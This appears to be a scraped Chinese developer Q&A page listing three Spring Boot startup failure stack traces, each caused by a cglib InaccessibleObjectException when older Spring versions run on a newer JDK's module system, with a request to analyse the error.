javaTools\apache-maven\maven-repository\org\springframework\spring-beans\4.3.13.RELEASE\spring-beans-4.3.13.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\spring-context\4.3.13.RELEASE\spring-context-4.3.13.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\spring-webmvc\4.3.13.RELEASE\spring-webmvc-4.3.13.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\spring-expression\4.3.13.RELEASE\spring-expression-4.3.13.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\slf4j\slf4j-api\1.7.25\slf4j-api-1.7.25.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\spring-core\4.3.13.RELEASE\spring-core-4.3.13.RELEASE.jar com.it.k.SpringBoot02ConfigApplication . ____ _ __ _ _ /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \ ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \ \\/ ___)| |_)| | | | | || (_| | ) ) ) ) ' |____| .__|_| |_|_| |_\__, | / / / / =========|_|==============|___/=/_/_/_/ :: Spring Boot :: (v1.5.9.RELEASE) 2025-08-26 22:00:56.864 INFO 38224 --- [ main] com.it.k.SpringBoot02ConfigApplication : Starting SpringBoot02ConfigApplication on K with PID 38224 (F:\javaCode\spring-boot-02-config\target\classes started by khy18 in F:\javaCode\spring-boot-02-config) 2025-08-26 22:00:56.866 INFO 38224 --- [ main] com.it.k.SpringBoot02ConfigApplication : No active profile set, falling back to default profiles: default 2025-08-26 22:00:56.917 INFO 38224 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@4ea5b703: startup date [Tue Aug 26 22:00:56 CST 2025]; root of context hierarchy 2025-08-26 22:00:57.321 ERROR 38224 --- [ main] o.s.boot.SpringApplication : Application startup failed java.lang.IllegalStateException: Cannot load configuration class: com.it.k.SpringBoot02ConfigApplication at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:403) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.postProcessBeanFactory(ConfigurationClassPostProcessor.java:249) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:283) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:127) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.support.AbstractApplicationContext.invokeBeanFactoryPostProcessors(AbstractApplicationContext.java:687) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:525) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.boot.context.embedded.EmbeddedWebApplicationContext.refresh(EmbeddedWebApplicationContext.java:122) ~[spring-boot-1.5.9.RELEASE.jar:1.5.9.RELEASE] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:693) ~[spring-boot-1.5.9.RELEASE.jar:1.5.9.RELEASE] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:360) ~[spring-boot-1.5.9.RELEASE.jar:1.5.9.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:303) ~[spring-boot-1.5.9.RELEASE.jar:1.5.9.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1118) ~[spring-boot-1.5.9.RELEASE.jar:1.5.9.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1107) ~[spring-boot-1.5.9.RELEASE.jar:1.5.9.RELEASE] at com.it.k.SpringBoot02ConfigApplication.main(SpringBoot02ConfigApplication.java:10) ~[classes/:na] Caused by: java.lang.ExceptionInInitializerError: null at org.springframework.context.annotation.ConfigurationClassEnhancer.newEnhancer(ConfigurationClassEnhancer.java:122) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.annotation.ConfigurationClassEnhancer.enhance(ConfigurationClassEnhancer.java:110) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:393) ~[spring-context-4.3.13.RELEASE.jar:4.3.13.RELEASE] ... 12 common frames omitted Caused by: org.springframework.cglib.core.CodeGenerationException: java.lang.reflect.InaccessibleObjectException-->Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @2f7298b at org.springframework.cglib.core.ReflectUtils.defineClass(ReflectUtils.java:464) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:336) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:93) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:91) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.internal.LoadingCache$2.call(LoadingCache.java:54) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[na:na] at org.springframework.cglib.core.internal.LoadingCache.createEntry(LoadingCache.java:61) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.internal.LoadingCache.get(LoadingCache.java:34) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData.get(AbstractClassGenerator.java:116) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.create(AbstractClassGenerator.java:291) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.create(KeyFactory.java:221) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:174) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:153) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.proxy.Enhancer.<clinit>(Enhancer.java:73) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] ... 15 common frames omitted Caused by: java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @2f7298b at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354) ~[na:na] at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297) ~[na:na] at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199) ~[na:na] at java.base/java.lang.reflect.Method.setAccessible(Method.java:193) ~[na:na] at org.springframework.cglib.core.ReflectUtils$1.run(ReflectUtils.java:61) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at java.base/java.security.AccessController.doPrivileged(AccessController.java:569) ~[na:na] at org.springframework.cglib.core.ReflectUtils.<clinit>(ReflectUtils.java:52) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.generateClass(KeyFactory.java:243) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.DefaultGeneratorStrategy.generate(DefaultGeneratorStrategy.java:25) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:329) ~[spring-core-4.3.13.RELEASE.jar:4.3.13.RELEASE] ... 27 common frames omitted 2025-08-26 22:00:57.322 INFO 38224 --- [ main] ationConfigEmbeddedWebApplicationContext : Closing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@4ea5b703: startup date [Tue Aug 26 22:00:56 CST 2025]; root of context hierarchy Process finished with exit code 1
08-27
java.lang.IllegalStateException: Cannot load configuration class: org.example.SpringBootDemo at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:414) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.postProcessBeanFactory(ConfigurationClassPostProcessor.java:254) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:284) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:128) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.support.AbstractApplicationContext.invokeBeanFactoryPostProcessors(AbstractApplicationContext.java:694) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:532) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:140) ~[spring-boot-2.0.1.RELEASE.jar:2.0.1.RELEASE] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:759) ~[spring-boot-2.0.1.RELEASE.jar:2.0.1.RELEASE] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:395) ~[spring-boot-2.0.1.RELEASE.jar:2.0.1.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:327) ~[spring-boot-2.0.1.RELEASE.jar:2.0.1.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1255) ~[spring-boot-2.0.1.RELEASE.jar:2.0.1.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1243) ~[spring-boot-2.0.1.RELEASE.jar:2.0.1.RELEASE] at org.example.SpringBootDemo.main(SpringBootDemo.java:10) ~[classes/:na] Caused by: java.lang.ExceptionInInitializerError: null at org.springframework.context.annotation.ConfigurationClassEnhancer.newEnhancer(ConfigurationClassEnhancer.java:122) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.annotation.ConfigurationClassEnhancer.enhance(ConfigurationClassEnhancer.java:110) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:403) ~[spring-context-5.0.5.RELEASE.jar:5.0.5.RELEASE] ... 12 common frames omitted Caused by: org.springframework.cglib.core.CodeGenerationException: java.lang.reflect.InaccessibleObjectException-->Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @4b1c1ea0 at org.springframework.cglib.core.ReflectUtils.defineClass(ReflectUtils.java:464) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:336) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:93) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:91) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.internal.LoadingCache$2.call(LoadingCache.java:54) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[na:na] at org.springframework.cglib.core.internal.LoadingCache.createEntry(LoadingCache.java:61) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.internal.LoadingCache.get(LoadingCache.java:34) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData.get(AbstractClassGenerator.java:116) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.create(AbstractClassGenerator.java:291) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.create(KeyFactory.java:221) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:174) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:153) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.proxy.Enhancer.<clinit>(Enhancer.java:73) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] ... 15 common frames omitted Caused by: java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @4b1c1ea0 at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354) ~[na:na] at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297) ~[na:na] at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199) ~[na:na] at java.base/java.lang.reflect.Method.setAccessible(Method.java:193) ~[na:na] at org.springframework.cglib.core.ReflectUtils$1.run(ReflectUtils.java:61) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at java.base/java.security.AccessController.doPrivileged(AccessController.java:569) ~[na:na] at org.springframework.cglib.core.ReflectUtils.<clinit>(ReflectUtils.java:52) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.generateClass(KeyFactory.java:243) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.DefaultGeneratorStrategy.generate(DefaultGeneratorStrategy.java:25) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:329) ~[spring-core-5.0.5.RELEASE.jar:5.0.5.RELEASE] ... 27 common frames omitted
最新发布
10-29
java.lang.IllegalStateException: Cannot load configuration class: com.alibaba.csp.sentinel.dashboard.DashboardApplication at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:414) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.postProcessBeanFactory(ConfigurationClassPostProcessor.java:254) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:282) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:126) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.support.AbstractApplicationContext.invokeBeanFactoryPostProcessors(AbstractApplicationContext.java:694) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:532) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:140) ~[spring-boot-2.0.5.RELEASE.jar!/:2.0.5.RELEASE] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:780) ~[spring-boot-2.0.5.RELEASE.jar!/:2.0.5.RELEASE] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:412) ~[spring-boot-2.0.5.RELEASE.jar!/:2.0.5.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:333) ~[spring-boot-2.0.5.RELEASE.jar!/:2.0.5.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1277) ~[spring-boot-2.0.5.RELEASE.jar!/:2.0.5.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1265) ~[spring-boot-2.0.5.RELEASE.jar!/:2.0.5.RELEASE] at com.alibaba.csp.sentinel.dashboard.DashboardApplication.main(DashboardApplication.java:33) ~[classes!/:na] at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103) ~[na:na] at java.base/java.lang.reflect.Method.invoke(Method.java:580) ~[na:na] at org.springframework.boot.loader.MainMethodRunner.run(MainMethodRunner.java:48) ~[sentinel-dashboard.jar:na] at org.springframework.boot.loader.Launcher.launch(Launcher.java:87) ~[sentinel-dashboard.jar:na] at org.springframework.boot.loader.Launcher.launch(Launcher.java:50) ~[sentinel-dashboard.jar:na] at org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:51) ~[sentinel-dashboard.jar:na] Caused by: java.lang.ExceptionInInitializerError: null at org.springframework.context.annotation.ConfigurationClassEnhancer.newEnhancer(ConfigurationClassEnhancer.java:122) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.annotation.ConfigurationClassEnhancer.enhance(ConfigurationClassEnhancer.java:110) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:403) ~[spring-context-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] ... 18 common frames omitted Caused by: org.springframework.cglib.core.CodeGenerationException: java.lang.reflect.InaccessibleObjectException-->Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @729b50bd at org.springframework.cglib.core.ReflectUtils.defineClass(ReflectUtils.java:464) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:336) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:93) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:91) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.internal.LoadingCache$2.call(LoadingCache.java:54) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317) ~[na:na] at org.springframework.cglib.core.internal.LoadingCache.createEntry(LoadingCache.java:61) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.internal.LoadingCache.get(LoadingCache.java:34) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData.get(AbstractClassGenerator.java:116) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.create(AbstractClassGenerator.java:291) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.create(KeyFactory.java:221) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:174) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:153) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.proxy.Enhancer.<clinit>(Enhancer.java:73) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] ... 21 common frames omitted Caused by: java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @729b50bd at java.base/java.lang.reflect.AccessibleObject.throwInaccessibleObjectException(AccessibleObject.java:388) ~[na:na] at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:364) ~[na:na] at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:312) ~[na:na] at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:203) ~[na:na] at java.base/java.lang.reflect.Method.setAccessible(Method.java:197) ~[na:na] at org.springframework.cglib.core.ReflectUtils$1.run(ReflectUtils.java:61) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at java.base/java.security.AccessController.doPrivileged(AccessController.java:571) ~[na:na] at org.springframework.cglib.core.ReflectUtils.<clinit>(ReflectUtils.java:52) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.generateClass(KeyFactory.java:243) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.DefaultGeneratorStrategy.generate(DefaultGeneratorStrategy.java:25) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:329) ~[spring-core-5.0.9.RELEASE.jar!/:5.0.9.RELEASE] ... 33 common frames omitted 2025-08-24 20:08:38.551 INFO 11968 --- [ main] ConfigServletWebServerApplicationContext : Closing org.springframework.boot.web.servlet.context.AnnotationConfigServletWebServerApplicationContext@1a8a8f7c: startup date [Sun Aug 24 20:08:37 CST 2025]; root of context hierarchy 分析报错
08-25
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值